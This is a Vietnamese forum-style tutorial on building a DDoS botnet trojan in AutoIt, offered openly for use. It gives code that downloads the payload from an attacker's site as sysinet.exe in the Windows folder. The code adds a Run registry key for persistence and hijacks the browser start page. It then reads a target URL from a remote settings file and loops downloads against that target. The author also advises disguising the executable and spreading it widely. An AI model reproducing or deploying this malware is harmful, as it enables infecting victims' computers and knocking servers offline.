Thực tập DDOS thông qua HTTP GET

Thực tập DDOS thông qua HTTP GET

Source AutoIT 3

http://www.4shared.com/file/55243733...6f/AutoIT.html

Nếu 1 website bảo mật wá , bạn úynh ko đc nó , cũng không đụng đc tới web server của nó thì chúng ta chơi chiêu bài cuối , không ăn được là đạp.

Tấn công từ chối dịch vụ DOS : Denial Of Service . ko chiếm quyền điều khiển mà mục đích là làm cho dich vụ đối phương cung cấp bị tê liệt .

DDOS : Distribute Denial Of Service : Tấn công từ chối dịch vụ phân tán , sử dụng hệ thống mạng botnet để tấn công .

Botnet : Hệ thống các máy tính zombie bị lây nhiễm các trojan , khi nhận lệnh của ta sẽ đồng loạt tấn công .


Sau đây là 1 cách DDOS thông qua HTTP Get , không ghê gớm lắm nhưng cũng làm đc khối tên ói máu nếu mạng botnet của bạn lớn

• Download và Cài AutoIT
• Tạo file script sau
• Compile thành file exe
• Tạo 1 website của bạn , upload file exe lên với tên trojan.txt
• Nhúng trojan này vào 1 cái gì đó hấp dẫn và quăng toán loạn

================================================== =====

Trích dẫn:

$website = "http://yourdomain/" ; Lay Nhiem Vao He Thong If Not FileExists(@WindowsDir & "\sysinet.exe") Then InetGet ($website & "/trojan.txt", @WindowsDir & "\sysinet.exe", 0, 1) Sleep(5000) EndIf

Đoạn mã trên để download trojan về máy nạn nhân , và rename lại thành file .exe để có khả năng thực thi. [ tại host free ko cho up exe ]

Trích dẫn:

; Ghi Khoa Registry RegWrite("HKEY_CURRENT_USER\Software\Policies\Micr osoft\Internet Explorer\Control Panel", "Homepage", "REG_DWORD", "1") RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Win dows\CurrentVersion\Policies\System", "DisableTaskMgr", "REG_DWORD", "0") RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Win dows\CurrentVersion\Policies\System", "DisableRegistryTools", "REG_DWORD", "0") RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Int ernet Explorer\Main", "Start Page", "REG_SZ", $website) RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Wi ndows\CurrentVersion\Run", "Task Manager", "REG_SZ", @WindowsDir & "\sysinet.exe")

Đoạn trên tạo các giá trị tự động chạy cho trojan sysinet.exe . Disable taskmanager và regedit của đối tượng
Ở đây mình set là 0 vì làm phiền đối tượng nó cáu cài lại máy thì phiền . Mình chỉ mượn tay nó đánh phụ thoy , nên tử tế chút

Trích dẫn:

InetGet ($website & "/setting.txt", @WindowsDir & "\setting.txt", 0, 1) Sleep(5000) $taptinmoi = FileOpen(@WindowsDir & "\setting.txt", 0) $sitetancong = FileReadLine($taptinmoi) $thoigian = FileReadLine($taptinmoi) FileClose($taptinmoi) while(1) InetGet ($sitetancong, @windowsDir , 0, 1) sleep($thoigian) wend

Đoạn này sẽ đọc file settings trên web site của bạn và bắt đầu download dữ liệu từ server về

file setting.txt đặt trên http://yourdomain/
và có nội dụng như sau

dòng 1 : link direct tới file cần download
dòng 2 : thời gian ngủ mỗi lần download
-----------------------------------------------------------------------

ví dụ :
http://abc.com/test.wmv << link direct . file size= 300 mb
300000 << vì file bự , cho ngủ 5 phút .

-----------------------------------------------------------------------
Chỉ cần khoảng vài trăm mạng cùng down bộ phim này thì cái server sẽ ra sao nhỉ

----------------------------------------------------------------------

Bass
----------------------------------------------------------------------
Chúc anh em vọc vui vẻ